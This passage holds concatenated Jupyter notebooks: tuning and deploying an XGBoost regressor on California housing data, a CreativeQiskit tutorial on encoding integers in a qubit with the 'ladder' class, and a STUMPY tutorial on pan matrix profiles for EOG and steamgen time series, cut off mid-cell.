print(f"The best score is: {round(tuner.best_score, 4)}")
###Output
_____no_output_____
###Markdown
Load the dataset
###Code
# load the dataset
housing = fetch_california_housing(as_frame=True)
orig_df = housing.frame
orig_df.head()
###Output
_____no_output_____
###Markdown
some EDA
###Code
get_general_info(orig_df)
analyze_df(orig_df)
# In this example I'll use all the columns (ex MedHouseVal) as features, except Lat, Long, to simplify
TARGET = "MedHouseVal"
all_cols = list(orig_df.columns)
cols_to_drop = ['Latitude', 'Longitude']
cat_cols = ['HouseAge']
# take care, I have sorted
FEATURES = sorted(list(set(all_cols) - set([TARGET])- set(cols_to_drop)))
# for LightGBM
cat_columns_idxs = [i for i, col in enumerate(FEATURES) if col in cat_cols]
FEATURES
# the only important thing is that we have 1 categorical column: HouseAge
# we will code categorical as integer starting from zero
# in this case it is easy, since the minimum is 1... so we need only to subtract 1
# make a copy before any changes
used_df = orig_df.copy()
used_df['HouseAge'] = used_df['HouseAge'] - 1.
used_df['HouseAge'] = used_df['HouseAge'].astype(int)
used_df['HouseAge'] = used_df['HouseAge'].astype("category")
# let's make a simple train/test split
X = used_df[FEATURES].values
y = used_df[TARGET].values
TEST_SIZE = 0.2
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=1)
###Output
_____no_output_____
###Markdown
HPO using ADSTuner
###Code
STUDY_NAME = "xgb001"
FOLDS = 5
TIME_BUDGET = 1800
#
# Here we define the strategy, the space for hyper-parameters we want to explore
#
params = {
"n_estimators": CategoricalDistribution([100, 200, 300, 400, 500, 600, 700, 800, 900, 1000]),
"learning_rate": LogUniformDistribution(low=1e-4, high=1e-2),
"max_depth": IntUniformDistribution(5, 10),
}
alg_reg = xgb.XGBRegressor()
tuner = ADSTuner(
alg_reg, cv=FOLDS, strategy=params, study_name=STUDY_NAME, scoring='neg_mean_absolute_error', n_jobs=8)
tuner.tune(X_train, y_train, exit_criterion=[TimeBudget(TIME_BUDGET)])
# get the status to see if completed
print(f"The tuner status is: {tuner.get_status()}")
print(f"Remaining time is: {round(tuner.time_remaining, 1)} sec.")
show_tuner_results(tuner)
# look only at completed trials, sorted with best on top. Metric chosen is in the value col.
result_df = tuner.trials[tuner.trials["state"] == "COMPLETE"].sort_values(
by=["value"], ascending=False
)
result_df.head(10)
###Output
_____no_output_____
###Markdown
Train with best params
###Code
%%time
### train with best params
model = xgb.XGBRegressor(**tuner.best_params)
model.fit(X_train, y_train)
###Output
CPU times: user 1h 20min 33s, sys: 11.2 s, total: 1h 20min 45s
Wall time: 2min 51s
###Markdown
Save the model
###Code
# save the model
MODEL_FILE_NAME = "model.pkl"
pickle.dump(model, open(MODEL_FILE_NAME, "wb"))
# test if it loads correctly
loaded_model = pickle.load(open(MODEL_FILE_NAME, "rb"))
loaded_model
###Output
_____no_output_____
###Markdown
Prepare for Model Catalog
###Code
PATH_ARTEFACT = f"./model-files"
if not os.path.exists(PATH_ARTEFACT):
os.mkdir(PATH_ARTEFACT)
# if we pass x_test, y_test generates in metadata also the schema
artifact = prepare_generic_model(model=model, model_path=PATH_ARTEFACT,
force_overwrite=True,
data_science_env=True,
X_sample=X_test,
y_sample=y_test,
use_case_type=UseCaseType.REGRESSION)
# add the model file to the PATH_ARTEFACT directory
pickle.dump(model, open(PATH_ARTEFACT + "/" + MODEL_FILE_NAME, "wb"))
# to set the serialization format in metadata
artifact.reload(model_file_name=MODEL_FILE_NAME)
###Output
_____no_output_____
###Markdown
Customize score.py
###Code
%%writefile {PATH_ARTEFACT}/score.py
import pandas as pd
import numpy as np
from xgboost import XGBRegressor
import json
import os
import pickle
import io
import logging
# logging configuration - OPTIONAL
logging.basicConfig(format='%(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger_pred = logging.getLogger('model-prediction')
logger_pred.setLevel(logging.INFO)
logger_feat = logging.getLogger('input-features')
logger_feat.setLevel(logging.INFO)
model_name = 'model.pkl'
# to enable/disable detailed logging
DEBUG = True
"""
Inference script. This script is used for prediction by scoring server when schema is known.
"""
def load_model(model_file_name=model_name):
"""
Loads model from the serialized format
Returns
-------
model: a model instance on which predict API can be invoked
"""
model_dir = os.path.dirname(os.path.realpath(__file__))
contents = os.listdir(model_dir)
# Load the model from the model_dir using the appropriate loader
if model_file_name in contents:
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), model_file_name), "rb") as file:
model = pickle.load(file)
logger_pred.info("Loaded the model !!!")
else:
raise Exception('{0} is not found in model directory {1}'.format(model_file_name, model_dir))
return model
def pre_inference(data):
"""
Preprocess data
Parameters
----------
data: Data format as expected by the predict API of the core estimator.
Returns
-------
data: Data format after any processing.
"""
logger_pred.info("Preprocessing...")
return data
def post_inference(yhat):
"""
Post-process the model results
Parameters
----------
yhat: Data format after calling model.predict.
Returns
-------
yhat: Data format after any processing.
"""
logger_pred.info("Postprocessing output...")
return yhat
def predict(data, model=load_model()):
"""
Returns prediction given the model and data to predict
Parameters
----------
model: Model instance returned by load_model API
data: Data format as expected by the predict API of the core estimator. For eg. in case of sckit models it could be numpy array/List of list/Pandas DataFrame
Returns
-------
predictions: Output from scoring server
Format: {'prediction': output from model.predict method}
"""
logger_pred.info("In function predict...")
# some check
assert model is not None, "Model is not loaded"
x = pd.read_json(io.StringIO(data)).values
if DEBUG:
logger_feat.info("Logging features")
logger_feat.info(x)
# preprocess data (for example normalize features)
x = pre_inference(x)
logger_pred.info("Invoking model......")
# compute predictions (binary, from model)
preds = model.predict(x)
# to avoid not JSON serialiable error (np.array is not)
preds = preds.tolist()
# post inference not needed
return {'prediction': preds}
###Output
Overwriting ./model-files/score.py
###Markdown
Model introspection
###Code
artifact.introspect()
# check all the info that will be saved to the Model Catalog
artifact.metadata_taxonomy.to_dataframe()
###Output
_____no_output_____
###Markdown
Some tests on the code before saving to Model Catalog
###Code
# %reload_ext autoreload
%load_ext autoreload
%autoreload 2
# add the path of score.py:
import sys
sys.path.insert(0, PATH_ARTEFACT)
from score import load_model, predict
# Load the model to memory
_ = load_model()
# select some records
START = 40
END = 50
predictions_test = predict(json.dumps(X_test[START:END].tolist()), _)
print()
print("*********************************")
print("Tests results:")
print()
print("Predicted:")
print(np.around(predictions_test['prediction'], 3))
print()
print("Expected:")
print(y_test[START:END])
print()
print(f"Computed MAE: {round(np.abs(predictions_test['prediction'] - y_test[START:END]).mean(), 2)}")
###Output
INFO:model-prediction:In function predict...
INFO:input-features:Logging features
INFO:input-features:[[1.05042017e+00 4.66386555e+00 5.08403361e+00 1.90000000e+01
2.24480000e+00 1.66500000e+03]
[1.02360877e+00 3.37268128e+00 6.10455312e+00 2.50000000e+01
4.99620000e+00 2.00000000e+03]
[1.09302326e+00 2.34302326e+00 5.56395349e+00 5.10000000e+01
3.23440000e+00 4.03000000e+02]
[1.20202020e+00 2.03030303e+00 4.06734007e+00 4.30000000e+01
2.61030000e+00 6.03000000e+02]
[9.26931106e-01 3.05219207e+00 4.34864301e+00 2.60000000e+01
2.64390000e+00 1.46200000e+03]
[1.03645008e+00 4.93977813e+00 4.36291601e+00 3.30000000e+01
3.17130000e+00 3.11700000e+03]
[1.75000000e+00 4.00000000e+00 1.05000000e+01 2.30000000e+01
5.87500000e+00 3.20000000e+01]
[1.03831982e+00 3.28150332e+00 6.07516581e+00 1.40000000e+01
5.48290000e+00 4.45300000e+03]
[1.00502513e+00 2.83542714e+00 4.56030151e+00 3.20000000e+01
3.24690000e+00 2.25700000e+03]
[1.10979228e+00 3.04451039e+00 4.75667656e+00 3.90000000e+01
1.36500000e+00 1.02600000e+03]]
INFO:model-prediction:Preprocessing...
INFO:model-prediction:Invoking model......
*********************************
Tests results:
Predicted:
[0.87 2.212 2.412 2.472 1.159 1.587 3.147 2.12 1.957 0.795]
Expected:
[0.589 1.56 2.455 5. 0.691 1.701 1.938 1.996 2.069 0.543]
Computed MAE: 0.58
###Markdown
Save to Model Catalog
###Code
# Saving the model artifact to the model catalog.
compartment_id = os.environ['NB_SESSION_COMPARTMENT_OCID']
project_id = os.environ['PROJECT_OCID']
set_auth(auth='resource_principal')
#
# Save to Model Catalog
#
catalog_entry = artifact.save(display_name='california-housing1',
description='A model for regression',
# to avoid to commit (be careful)
ignore_pending_changes=True)
###Output
_____no_output_____ |
tutorials/ladder.ipynb | ###Markdown
How to use `ladder`
###Code
import sys
sys.path.append('../')
import CreativeQiskit
###Output
_____no_output_____
###Markdown
A single qubit cannot store more than one bit of information. But if we are happy to run our program many times and do some statistics, one repeatedly used qubit can store more information. The ladder class does just this, by encoding an `int`-like object into a qubit. These quantum integers run from a minimum value of `0` to a maximum of `d`, which is the input we must supply when initializing a `ladder` object. Let's go for `d=3` in our first example.
###Code
A = CreativeQiskit.ladder(3)
###Output
_____no_output_____
###Markdown
The initial value for a `ladder` object is always `0`.
###Code
a = A.value()
print(' Initial value =',a)
###Output
Initial value = 0
###Markdown
We can add to this to get other numbers.
###Code
A.add(1)
print(' Add 1 ---> value =',A.value())
A.add(2)
print(' Add 2 ---> value =',A.value())
###Output
Add 2 ---> value = 3
###Markdown
Once the maximum value has been reached, the `add()` method will instead start subtracting. This is the inspiration behind the 'ladder' name: once you've reached the top, there's nowhere to climb but back down again.
###Code
for example in range(9):
A.add(1)
print(' Add 1 ---> value =',A.value())
###Output
Add 1 ---> value = 2
Add 1 ---> value = 1
Add 1 ---> value = 0
Add 1 ---> value = 1
Add 1 ---> value = 2
Add 1 ---> value = 3
Add 1 ---> value = 2
Add 1 ---> value = 1
Add 1 ---> value = 0
###Markdown
Since we are doing statistics in order to squeeze an `int`-like object into a qubit, the behaviour can sometimes be erratic. This becomes ever more true for larger values of `d`. The erratic behaviour also depends on the kwargs for the `value()` method. It can be due to the statistical noise of using only a few samples, or to the real or simulated noise found on current prototype devices. These are controlled using the standard kwargs `device`, `noisy` and `shots` as explained in [the README](README.md). The more statistical noise you have from a low value of `shots` (which should be around 1000 times greater than `d`), and the more quantum noise you have from a real device, the more strange behaviour you will see. In the example below, `shots` is only $5 \times$ `d`.
###Code
A = CreativeQiskit.ladder(10)
for example in range(20):
print(' Add 1 ---> value =',A.value(shots=50))
A.add(1)
###Output
Add 1 ---> value = 0
Add 1 ---> value = 1
Add 1 ---> value = 2
Add 1 ---> value = 2
Add 1 ---> value = 4
Add 1 ---> value = 5
Add 1 ---> value = 6
Add 1 ---> value = 8
Add 1 ---> value = 9
Add 1 ---> value = 10
Add 1 ---> value = 10
Add 1 ---> value = 9
Add 1 ---> value = 9
Add 1 ---> value = 8
Add 1 ---> value = 6
Add 1 ---> value = 5
Add 1 ---> value = 4
Add 1 ---> value = 3
Add 1 ---> value = 3
Add 1 ---> value = 0
###Markdown
Here's an example where the noise of current prototype devices is simulated.
###Code
A = CreativeQiskit.ladder(10)
for example in range(20):
print(' Add 1 ---> value =',A.value(noisy=True))
A.add(1)
###Output
Add 1 ---> value = 2
Add 1 ---> value = 2
Add 1 ---> value = 3
Add 1 ---> value = 4
Add 1 ---> value = 4
Add 1 ---> value = 5
Add 1 ---> value = 5
Add 1 ---> value = 6
Add 1 ---> value = 7
Add 1 ---> value = 7
Add 1 ---> value = 7
Add 1 ---> value = 7
Add 1 ---> value = 6
Add 1 ---> value = 6
Add 1 ---> value = 6
Add 1 ---> value = 5
Add 1 ---> value = 5
Add 1 ---> value = 4
Add 1 ---> value = 4
Add 1 ---> value = 4
###Markdown
The `ladder` object was inspired by the way attacks are implemented in the game [Battleships with partial NOT gates](https://medium.com/qiskit/how-to-program-a-quantum-computer-982a9329ed02). In this, each player has three ships that take up a single position. One of them needs only one hit to be destroyed, one needs two hits and the other needs three. These can be implemented with `ladder` objects with `d=1`, `d=2` and `d=3`, respectively.
###Code
ship = [None]*3
ship[0] = CreativeQiskit.ladder(1)
ship[1] = CreativeQiskit.ladder(2)
ship[2] = CreativeQiskit.ladder(3)
###Output
_____no_output_____
###Markdown
Attacking a ship is then done with `add(1)`, and a ship is declared destroyed once its value of `d` has been reached. *Note: The following cell is interactive, so you'll need to run it yourself.*
###Code
destroyed = 0
while destroyed<3:
attack = int(input('\n > Choose a ship to attack (0,1 or 2)...\n '))
ship[attack].add(1)
destroyed = 0
for j in range(3):
if ship[j].value()==ship[j].d:
print('\n *Ship',j,'has been destroyed!*')
destroyed += 1
print('\n **Mission complete!**')
###Output
_____no_output_____ |
_source/raw/recsys_streamlit_app.ipynb | ###Markdown
---
###Code
!mkdir ./ikea
!cp -r /content/pair/* ./ikea
###Output
_____no_output_____ |
examples/notebooks/45_cog_mosaic.ipynb | ###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` has been removed from geemap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` has been removed from leafmap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = (
'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
)
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` has been removed from leafmap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_COG_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = 'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_COG_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____
###Markdown
Uncomment the following line to install [geemap](https://geemap.org) if needed.**Important Note:** This notebook no longer works. The `add_cog_mosaic()` function has been removed from geemap. See https://github.com/giswqs/leafmap/issues/180
###Code
# !pip install geemap
import geemap
# geemap.update_package()
Map = geemap.Map(ee_initialize=False, layer_ctrl=True, toolbar_ctrl=False)
Map
###Output
_____no_output_____
###Markdown
For this demo, we will use data from https://www.maxar.com/open-data/california-colorado-fires for mapping California and Colorado fires. A List of COGs can be found [here](https://github.com/giswqs/geemap/blob/master/examples/data/cog_files.txt).
###Code
URL = (
'https://raw.githubusercontent.com/giswqs/geemap/master/examples/data/cog_files.txt'
)
import urllib
data = urllib.request.urlopen(URL)
links = []
for line in data:
links.append(line.decode("utf-8").strip())
links = links[1:] # remove the first line that does not contain .tif
# links
Map.add_cog_mosaic(links, name="CA Fire", show_footprints=True, verbose=True)
Map.addLayerControl()
Map
###Output
_____no_output_____ |
docs/Tutorial_Pan_Matrix_Profile.ipynb | ###Markdown
Finding and Visualizing Time Series Motifs of All Lengths using the Matrix Profile Import Some Packages
###Code
%matplotlib inline
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import cm
import ipywidgets as widgets
from ipywidgets import interact, Layout
import stumpy
plt.style.use('stumpy.mplstyle')
###Output
_____no_output_____
###Markdown
EOG ExampleSee [Figure 1](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf)
###Code
eog_df = pd.read_csv("https://zenodo.org/record/4733142/files/eog.csv?download=1")
m_250 = 250
m_500 = 500
mp_250 = stumpy.stump(eog_df["EOG"], m=m_250)
mp_500 = stumpy.stump(eog_df["EOG"], m=m_500)
motif_idx_250 = np.argmin(mp_250[:, 0])
motif_idx_500 = np.argmin(mp_500[:, 0])
nn_idx_250 = mp_250[motif_idx_250, 1]
nn_idx_500 = mp_500[motif_idx_500, 1]
fig, axs = plt.subplots(3)
axs[0].plot(eog_df["EOG"].values)
axs[1].plot(np.arange(m_250), eog_df.iloc[motif_idx_250 : motif_idx_250 + m_250])
axs[1].plot(np.arange(m_250), eog_df.iloc[nn_idx_250 : nn_idx_250 + m_250])
axs[2].plot(np.arange(m_500), eog_df.iloc[motif_idx_500 : motif_idx_500 + m_500])
axs[2].plot(np.arange(m_500), eog_df.iloc[nn_idx_500 : nn_idx_500 + m_500])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMPEssentially, `stumpy.stimp` implements [Table 2](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf).
###Code
min_m, max_m = 100, 1000
eog = stumpy.stimp(eog_df["EOG"].values, min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
eog.update()
###Output
_____no_output_____
###Markdown
Above, we select a range of window sizes from `min_m = 100` to `max_m = 1000` and we arrange the windows in this range according to a breadth-first order (this is done automatically by `stumpy.stimp`; see [slide 32](https://drive.google.com/file/d/1eT9oHOAKoi4oGkUX26V9aZIopov0Pxt5/view) and/or [Section C](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf)). The order in which the window sizes will be processed can be found in the `.M_` attribute:
###Code
eog.M_[:n]
###Output
_____no_output_____
###Markdown
Notice that we don't compute the matrix profiles (approximated using `stumpy.scrump` at 1% and with `pre-scrump` turned on) for all of the window sizes and, instead, we select only 1% of the window sizes (`percent_m = 0.01`) for this task. So, only a total of `n` matrix profiles were computed. Now, let's plot our pan matrix profile along with the locations of our motif pairs (vertical red lines):
###Code
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Now, we'll compute 2% more matrix profiles (for a total of 1% + 2% = 3%) for additional windows:
###Code
for _ in range(2 * n):
eog.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Notice how the pan matrix profile has become a bit clearer and less "blocky"? Steamgen Example
###Code
steam_df = pd.read_csv("https://zenodo.org/record/4273921/files/STUMPY_Basics_steamgen.csv?download=1")
m = 640
mp = stumpy.stump(steam_df["steam flow"], m=m)
motif_idx = np.argmin(mp[:, 0])
nn_idx = mp[motif_idx, 1]
fig, axs = plt.subplots(2)
axs[0].plot(steam_df["steam flow"].values)
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[motif_idx : motif_idx + m])
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[nn_idx : nn_idx + m])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMP
###Code
min_m, max_m = 100, 3000
steam = stumpy.stimp(steam_df['steam flow'], min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
for _ in range(2 * n):
steam.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Bonus Section
###Code
%matplotlib widget
plt.style.use('stumpy.mplstyle')
plt.ioff()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
plt.ion()
ax = plt.gca()
ax.format_coord = lambda x, y: f'Time = {x:.0f}, m = {y:.0f}'
lines = [motif_idx, nn_idx]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(steam.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
def update_slider(change):
PAN = steam.pan(threshold=change['new'])
im.set_data(PAN)
fig.canvas.draw_idle()
threshold = 0.2
slider = widgets.FloatSlider(value=threshold, min=0.0, max=1.0, step=0.01, readout_format='.2f', layout=Layout(width='80%'), description='Threshold:')
slider.observe(update_slider, names='value')
widgets.VBox([fig.canvas, slider])
###Output
_____no_output_____
###Markdown
Finding and Visualizing Time Series Motifs of All Lengths using the Matrix Profile Import Some Packages
###Code
%matplotlib inline
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import cm
import ipywidgets as widgets
from ipywidgets import interact, Layout
import stumpy
plt.style.use('https://raw.githubusercontent.com/TDAmeritrade/stumpy/main/docs/stumpy.mplstyle')
###Output
_____no_output_____
###Markdown
EOG ExampleSee [Figure 1](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf)
###Code
eog_df = pd.read_csv("https://zenodo.org/record/4733142/files/eog.csv?download=1")
m_250 = 250
m_500 = 500
mp_250 = stumpy.stump(eog_df["EOG"], m=m_250)
mp_500 = stumpy.stump(eog_df["EOG"], m=m_500)
motif_idx_250 = np.argmin(mp_250[:, 0])
motif_idx_500 = np.argmin(mp_500[:, 0])
nn_idx_250 = mp_250[motif_idx_250, 1]
nn_idx_500 = mp_500[motif_idx_500, 1]
fig, axs = plt.subplots(3)
axs[0].plot(eog_df["EOG"].values)
axs[1].plot(np.arange(m_250), eog_df.iloc[motif_idx_250 : motif_idx_250 + m_250])
axs[1].plot(np.arange(m_250), eog_df.iloc[nn_idx_250 : nn_idx_250 + m_250])
axs[2].plot(np.arange(m_500), eog_df.iloc[motif_idx_500 : motif_idx_500 + m_500])
axs[2].plot(np.arange(m_500), eog_df.iloc[nn_idx_500 : nn_idx_500 + m_500])
plt.show()
###Output
_____no_output_____
###Markdown
Compute the Pan Matrix Profile using STIMPEssentially, `stumpy.stimp` implements [Table 2](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf).
###Code
min_m, max_m = 100, 1000
eog = stumpy.stimp(eog_df["EOG"].values, min_m=min_m, max_m=max_m, percentage=0.01) # This percentage controls the extent of `stumpy.scrump` completion
percent_m = 0.01 # The percentage of windows to compute
n = np.ceil((max_m - min_m) * percent_m).astype(int)
for _ in range(n):
eog.update()
###Output
_____no_output_____
###Markdown
Above, we select a range of window sizes from `min_m = 100` to `max_m = 1000` and we arrange the windows in this range according to a breadth-first order (this is done automatically by `stumpy.stimp`; see [slide 32](https://drive.google.com/file/d/1eT9oHOAKoi4oGkUX26V9aZIopov0Pxt5/view) and/or [Section C](https://www.cs.ucr.edu/~eamonn/PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf)). The order in which the window sizes will be processed can be found in the `.M_` attribute:
###Code
eog.M_[:n]
###Output
_____no_output_____
###Markdown
Notice that we don't compute the matrix profiles (approximated using `stumpy.scrump` at 1% and with `pre-scrump` turned on) for all of the window sizes and, instead, we select only 1% of the window sizes (`percent_m = 0.01`) for this task. So, only a total of `n` matrix profiles were computed. Now, let's plot our pan matrix profile along with the locations of our motif pairs (vertical red lines):
###Code
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Now, we'll compute 2% more matrix profiles (for a total of 1% + 2% = 3%) for additional windows:
###Code
for _ in range(2 * n):
eog.update()
fig = plt.figure()
fig.canvas.toolbar_visible = False
fig.canvas.header_visible = False
fig.canvas.footer_visible = False
lines = [motif_idx_250, motif_idx_500, nn_idx_250, nn_idx_500]
color_map = cm.get_cmap("Greys_r", 256)
im = plt.imshow(eog.PAN_, cmap=color_map, origin="lower", interpolation="none", aspect="auto")
plt.xlabel("Time", fontsize="20")
plt.ylabel("m", fontsize="20")
plt.clim(0.0, 1.0)
plt.colorbar()
plt.tight_layout()
# Draw some vertical lines where each motif and nearest neighbor are located
if lines is not None:
for line in lines:
plt.axvline(x=line, color='red')
plt.show()
###Output
_____no_output_____
###Markdown
Notice how the pan matrix profile has become a bit clearer and less "blocky"? Steamgen Example
###Code
steam_df = pd.read_csv("https://zenodo.org/record/4273921/files/STUMPY_Basics_steamgen.csv?download=1")
m = 640
mp = stumpy.stump(steam_df["steam flow"], m=m)
motif_idx = np.argmin(mp[:, 0])
nn_idx = mp[motif_idx, 1]
fig, axs = plt.subplots(2)
axs[0].plot(steam_df["steam flow"].values)
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[motif_idx : motif_idx + m])
axs[1].plot(np.arange(m), steam_df["steam flow"].iloc[nn_idx : nn_idx + m])
